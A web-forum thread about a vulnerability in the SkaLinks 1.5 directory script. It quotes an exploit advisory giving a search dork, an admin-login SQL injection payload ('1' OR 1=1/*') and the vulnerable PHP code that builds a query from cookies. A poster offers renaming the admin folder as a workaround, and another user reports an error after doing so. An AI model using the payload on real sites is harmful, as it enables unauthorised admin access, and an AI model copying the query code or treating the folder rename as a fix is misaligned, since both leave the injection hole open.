| Author |
Message |
sqlinjection
Member
|
Posted: 26 Dec 2009 16:30:18
It appears that skalinks is hardly updated as seen V1.5 is the latest from 2006.
As found googling "powered by skalinks" result #5 in: http://www.milw0rm.com/exploits/7932
########################################
# #
# Product : SkaLinks #
# Version : 1.5 #
# Dork : Powered by SkaLinks #
# Site: http://www.skalinks.com/ #
# Founded by: Dimi4 #
# Date : 29.01.09 #
# Greetz: antichat #
# #
########################################
SQL-injection, Auth Bypass
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1' OR 1=1/*
Bug Function:
function IsAdmin( )
{
$table_name = $this->m_AdminsTable;
$res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'");
if ( !$res )
{
return 0;
}
else
{
return $res;
}
}
(c) Dimi4, 2009 greetz to antichat
# milw0rm.com [2009-01-30]
|
sqlinjection
Member
|
Posted: 26 Dec 2009 16:34:57
Sorry, #2 search result... SO ALMOST EVERYONE LOOKING 4 THAT SEARCH TERM WOULD NOTICE THIS VULNERABILITY.
My recomendation for now until skalinks is updated (if applicable) is to change admin folder to whatever difficult to guess (I reccomend hypens, numbers...) and change headers.php ( $_skalinks_url['admin'] and $_skalinks_dir['admin']) to point to the new folder.
|
Only Heavy Metal
Member
|
Posted: 2 Jan 2010 04:02:36 | Edited by: Only Heavy Metal
Hi
I did exactly what you say. I changed the name of the admin folder and changed headers.php ( $_skalinks_url['admin'] and $_skalinks_dir['admin'])
I am getting this message in the admin. Did i forgot something?
Warning: opendir(/home/directory/public_html/links-exchange/admin/db_backup/) [function.opendir]: failed to open dir: No such file or directory in /home/directory/public_html/links-exchange/admin2/index.php on line 178
Changed my folder to directory, dont want to show my folder here.
Cheers,
Edwin
|
|
